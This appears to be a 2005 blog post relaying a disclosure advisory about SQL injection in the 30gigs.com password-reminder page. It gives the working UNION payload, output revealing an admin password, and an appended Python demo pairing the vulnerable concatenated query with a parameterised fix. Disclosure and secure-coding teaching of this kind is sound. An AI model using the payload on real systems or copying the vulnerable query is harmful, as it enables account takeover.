ush.it - a beautiful place

Password discovery su 30gigs.com

November 16, 2005 at 2:40 pm - Filed under Insecurity, Language EN - 246 words, reading time ~0 minutes - Permalink - Comments

cumhur onat found a SQL injection that allows retrieving the password of an arbitrary user through the login page of the 30gigs.com mail service.

If you have an account on 30gigs.com, it is advisable to change your password frequently these days, until the problem is fixed.

What is 30gigs.com? You can find a review here (on downloadblog.it):

http://www.downloadblog.it/post/509/30gigscom-webmail-gratis-da-30-gigabyte

Mail received at 14:16 on fd (full-disclosure@lists.grok.org.uk)

cumhur onat wrote:
> I found a sql injection vulnerability, which leads to password
> disclosure in 30gigs.com email service.
> The vulnerability exists in http://www.30gigs.com/getpassword/ page due
> to lack of validation of user submitted data.
> Proof of Concept:
> enter http://www.30gigs.com/getpassword/
> and copy & paste this code in the Login field, finally submit the form.
>
> not_existant' union select
> 1,1,1,1,1,UserPassword,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from users where
> userLogin='admin
>
> it will give an output like below, in which "runsit" corresponds to the
> password of account "admin"
> We have sent the password for your not_existant' union select
> 1,1,1,1,1,UserPassword,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from users where
> userLogin='admin@30gigs.com account to runsit
>
> The site has been notified about the vulnerability 2 weeks ago, but no
> response was taken.
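The advisory above shows a classic UNION-based injection: the Login field is pasted straight into the SQL text, so the attacker's `union select` appends a row whose "email" column is actually `UserPassword`, and the confirmation message then echoes that value. The following is an added example (not code from the original post or from 30gigs.com) that reproduces the flaw on a constructed in-memory SQLite table with a made-up three-column schema, and places the fix beside it. The payload is the advisory's, adapted to the toy table's two-column SELECT; the column names `userLogin` and `UserPassword` come from the advisory, everything else (`userEmail`, the sample rows, the `password_reminder_*` functions) is an assumption for illustration.

```python
import sqlite3


def make_db():
    """Constructed toy schema; not 30gigs.com's real table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (userLogin TEXT, userEmail TEXT, UserPassword TEXT)"
    )
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [
            ("admin", "admin@example.invalid", "constructed-secret"),
            ("alice", "alice@example.invalid", "hunter2"),
        ],
    )
    return conn


def password_reminder_vulnerable(conn, login):
    """Builds the query by string concatenation: the Login field becomes SQL.

    A UNION in the login text adds a row of the attacker's choosing, and the
    confirmation message prints whatever landed in the 'email' column.
    """
    sql = "SELECT userLogin, userEmail FROM users WHERE userLogin = '" + login + "'"
    row = conn.execute(sql).fetchone()
    if row is None:
        return "No such account"
    return "We have sent the password for your %s account to %s" % (login, row[1])


def password_reminder_fixed(conn, login):
    """Parameterised query: the driver binds the login as a value, never as SQL.

    The response is also made uniform so it neither echoes untrusted input
    nor reveals the destination address or whether the account exists.
    """
    sql = "SELECT userLogin, userEmail FROM users WHERE userLogin = ?"
    conn.execute(sql, (login,)).fetchone()  # result used only to decide whether to send
    return "If that account exists, a reminder has been sent to the address on file"


# The advisory's payload, adapted to the toy table's two-column SELECT.
PAYLOAD = "not_existant' union select 1,UserPassword from users where userLogin='admin"


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", password_reminder_vulnerable(db, PAYLOAD))
    print("fixed:     ", password_reminder_fixed(db, PAYLOAD))
```

With the vulnerable handler the printed message ends in `constructed-secret`, exactly the shape of the output quoted in the mail; with the parameterised handler the same input is simply a login that does not exist. Note that escaping quotes by hand is not an adequate alternative to binding parameters, and that a "send me my password" feature that can print the stored password at all implies the passwords are kept in recoverable form, which is a second finding in its own right.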
